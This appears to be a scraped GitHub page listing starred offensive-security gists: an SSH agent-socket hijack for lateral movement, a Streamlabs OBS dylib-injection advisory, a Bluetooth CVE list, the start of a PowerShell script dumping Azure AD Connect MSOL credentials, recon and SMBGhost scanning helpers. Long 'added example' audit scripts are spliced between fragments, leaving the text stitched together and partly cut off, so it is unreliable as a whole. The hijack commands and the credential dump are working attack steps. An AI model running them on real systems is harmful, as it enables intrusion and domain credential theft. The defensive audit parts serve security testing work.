Bob of DevOps star-bob

  • LITFA
  • In your house!!
@benpturner
benpturner / GetAadJoinInformation.cs
Created April 20, 2021 19:37
GetAadJoinInformation C# Module
using System;
using System.Collections.Generic;
using System.Management;
using System.DirectoryServices;
using System.DirectoryServices.ActiveDirectory;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Collections;
using System.Runtime.InteropServices;

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
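The gist above only needs one input, the path of a forwarded agent socket. The following script is an added example (not part of the gist) that finds those sockets on a bastion, reports who owns each one and whether the process behind it is still alive, and lists the keys the agent will sign with. It assumes sshd's default socket layout (/tmp/ssh-XXXX/agent.PID) and a standard ssh-add; run it as root so kill -0 and the socket reads are not refused.

```shell
# Added example: audit forwarded ssh-agent sockets on a bastion.
# Not from the original gist; assumes sshd's default /tmp/ssh-*/agent.PID layout.

# /tmp/ssh-srQ6Q5UpOL/agent.1460 -> 1460. The number is the PID of the
# process that created the socket (the sshd session for a forwarded agent).
agent_pid_from_socket() {
    case "$1" in
        */agent.[0-9]*) printf '%s\n' "${1##*/agent.}" ;;
        *) return 1 ;;
    esac
}

# Candidate sockets under a directory (default /tmp, where sshd puts them).
list_agent_sockets() {
    find "${1:-/tmp}" -path '*/ssh-*/agent.*' -type s 2>/dev/null
}

# Owner of a path: GNU stat first, BSD/macOS stat as fallback.
file_owner() {
    stat -c %U "$1" 2>/dev/null || stat -f %Su "$1"
}

# One line per socket plus the keys behind it. ssh-add talks to the socket
# exactly as ssh would, so a readable socket means usable keys: no password,
# no key file, just the identity of whoever forwarded their agent here.
audit_agents() {
    list_agent_sockets "$1" | while IFS= read -r sock; do
        pid=$(agent_pid_from_socket "$sock") || continue
        if kill -0 "$pid" 2>/dev/null; then state=live; else state=stale; fi
        printf '%s owner=%s pid=%s %s\n' "$sock" "$(file_owner "$sock")" "$pid" "$state"
        SSH_AUTH_SOCK="$sock" ssh-add -l 2>/dev/null | sed 's/^/    /'
    done
}

# audit_agents        # as root on the bastion; then SSH_AUTH_SOCK=<sock> ssh user@target
```

The same enumeration is the defender's check: any socket this script lists is a credential that every root user on the bastion can borrow. Users who must go through a jump host should use `ssh -J` instead of `ForwardAgent yes`, or at least load keys with `ssh-add -c` so each signature prompts for confirmation on their own machine.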
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/
@theevilbit
theevilbit / _obs_tcc.md
Last active August 3, 2021 22:14
[StreamLabs OBS macOS TCC bypass]

The Streamlabs macOS thick client does have hardened runtime enabled, but it specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app and possibly gain persistence on the machine; beyond that, as Streamlabs has access to the microphone and camera, an attacker would gain access to those once the app is exploited.

We can see the wrong permissions by running the codesign utility:

csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
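An added example, not part of the advisory: a script that turns the codesign output into a verdict, so the same check can be run across every app in /Applications. It reads the entitlement plist from stdin (on macOS, the output of `codesign -d --entitlements :- <app>` as used above) and reports whether the hardened runtime still blocks dylib injection. The two sample plists are constructed for offline testing and are not Streamlabs' real entitlements.

```shell
# Added example: classify an app's hardened-runtime entitlements.
# Sample plists below are constructed; they are not the real Streamlabs output.

# Print the name of every boolean entitlement whose value is <true/>.
# Entitlement plists put <key>NAME</key> on one line and <true/> on the next.
true_entitlements() {
    awk '
        match($0, /<key>[^<]*<\/key>/) { key = substr($0, RSTART + 5, RLENGTH - 11) }
        /<true\/>/ && key != ""       { print key; key = "" }
    '
}

# Verdict on stdout, one word, from the plist on stdin:
#   injectable  disable-library-validation AND allow-dyld-environment-variables:
#               DYLD_INSERT_LIBRARIES=/path/evil.dylib loads an unsigned library
#   no-libval   library validation off: a dylib the app already loads can be
#               replaced or proxied, but DYLD_* variables are still ignored
#   dyld-env    DYLD_* honoured, but the injected dylib must pass library
#               validation (same Team ID or Apple-signed)
#   ok          neither flag set
assess_entitlements() {
    ents=$(true_entitlements)
    lv=0; dyld=0
    printf '%s\n' "$ents" | grep -qx 'com.apple.security.cs.disable-library-validation' && lv=1
    printf '%s\n' "$ents" | grep -qx 'com.apple.security.cs.allow-dyld-environment-variables' && dyld=1
    if   [ "$lv" = 1 ] && [ "$dyld" = 1 ]; then echo injectable
    elif [ "$lv" = 1 ]; then echo no-libval
    elif [ "$dyld" = 1 ]; then echo dyld-env
    else echo ok
    fi
}

# macOS only: the same check against an installed bundle.
audit_app() {   # audit_app "/Applications/Streamlabs OBS.app"
    codesign -d --entitlements :- "$1" 2>/dev/null | assess_entitlements
}

# Constructed sample: both weak flags set, plus the TCC-relevant device entitlements.
WEAK_PLIST='<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
	<key>com.apple.security.cs.allow-dyld-environment-variables</key>
	<true/>
	<key>com.apple.security.cs.disable-library-validation</key>
	<true/>
	<key>com.apple.security.device.audio-input</key>
	<true/>
	<key>com.apple.security.device.camera</key>
	<true/>
</dict>
</plist>'

# Constructed sample: hardened runtime left intact, device access only.
OK_PLIST='<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
	<key>com.apple.security.cs.disable-library-validation</key>
	<false/>
	<key>com.apple.security.device.audio-input</key>
	<true/>
</dict>
</plist>'

# printf '%s\n' "$WEAK_PLIST" | assess_entitlements   # prints: injectable
```

Only the "injectable" combination gives the DYLD_INSERT_LIBRARIES route the advisory describes; "no-libval" still matters because the unsigned-dylib check is what stops a replaced or proxied dependency, and the verdict should be read together with the device entitlements that make the app a worthwhile TCC target.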
@tdec
tdec / gist:128751d818e9753364a72086b961390b
Last active June 23, 2023 20:41
Bluetooth vulnerabilities
Vulnerabilities published in Bluetooth SIG, Android, Apple, Intel and Qualcomm security bulletins, presented at security conferences, or written up as master's theses. If any are missing, thanks for pointing me to them!
Todo: macOS
Year | Name | CVE
2020 | Blurtooth: Exploiting Cross-Transport Key Derivation | 2020-15802
2020 | Pairing Method Confusion | 2020-10134
2020 | BIAS: Bluetooth Impersonation Attacks | 2020-10135
2020 | BlueRepli | ?
2020 | BLESA: Bluetooth Low energy spoofing attacks | 2020-9770
@mpgn
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
@qdm12
qdm12 / README.md
Last active October 27, 2025 17:44
Wireguard and iptables restrictions for multiple users

If you don't know what Wireguard is, well, you should. It's fast, easy to set up and highly configurable. We will configure Wireguard for multiple users with various restrictions using iptables.

Assumptions

This should fit most setups (not mine though 😉)

@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active July 30, 2025 13:07
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at a target's assets and making notes while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# (Go 1.17 and later no longer install binaries via go get; use go install <module path>@latest instead)
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
    # subfinder enumerates, httprobe keeps only hosts answering on HTTP(S),
    # then each live URL is opened in Firefox with a 10 s pause between them
    subfinder -d "$1" -silent -t 100 | httprobe -c 50 | sort -u | while read -r line; do firefox "$line"; sleep 10; done
}
@nikallass
nikallass / check-smb-v3.11.sh
Created March 11, 2020 04:57
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
# CVE-2020-0796 (SMBGhost) pre-filter: list hosts in TARGET that advertise
# SMB dialect 3.11 (3.1.1). Dialect alone is not proof of vulnerability: only
# unpatched Windows 10 / Server 1903 and 1909 are affected, and 3.1.1 is also
# spoken by patched Windows and by non-Windows servers.
if [ $# -eq 0 ]; then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi
echo "Checking if there's SMB v3.11 in $1 ..."
# Remember the IP from each "Nmap scan report for" line and print it once
# when that host's smb-protocols table lists 3.11 (portable awk, no mysql 'replace').
nmap -p445 --script smb-protocols -Pn -n "$1" | awk '
    /^Nmap scan report for/ { ip = ""; if (match($0, /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)) ip = substr($0, RSTART, RLENGTH) }
    /^\|/ && /3\.11/ && ip != "" { print ip; ip = "" }
'